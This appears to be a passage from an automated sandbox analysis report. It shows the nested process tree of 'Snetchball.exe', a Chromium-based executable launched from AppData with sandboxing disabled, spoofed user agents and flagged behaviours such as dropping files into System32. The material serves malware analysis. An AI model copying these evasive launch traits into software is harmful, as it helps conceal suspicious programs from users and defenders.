C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3176 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:840⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3688 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:840⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3736 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:140⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3724 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:140⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2888 --field-trial-handle=2892,i,12336451235938915262,700231325289031557,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:243⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3180 --field-trial-handle=2892,i,12336451235938915262,700231325289031557,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:843⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3192 --field-trial-handle=2892,i,12336451235938915262,700231325289031557,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:843⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3212 --field-trial-handle=2892,i,12336451235938915262,700231325289031557,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:143⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=2892,i,12336451235938915262,700231325289031557,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:143⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"45⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:246⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3212 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:846⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3276 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:846⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3352 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:146⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3364 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:146⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3908 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:146⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3948 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:846⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4000 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:846⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4180 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:146⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4196 --field-trial-handle=2960,i,12764452702152727141,13233463128452847074,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:146⤵
- Checks computer location settings
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"45⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"45⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"45⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"45⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1184 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:140⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3960 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:840⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3952 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:840⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4192 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:140⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4264 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:140⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4228 --field-trial-handle=2864,i,302712558511215803,4821368404878417226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:240⤵
- Drops file in System32 directory
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"39⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"39⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"39⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"39⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"39⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
-
-
-
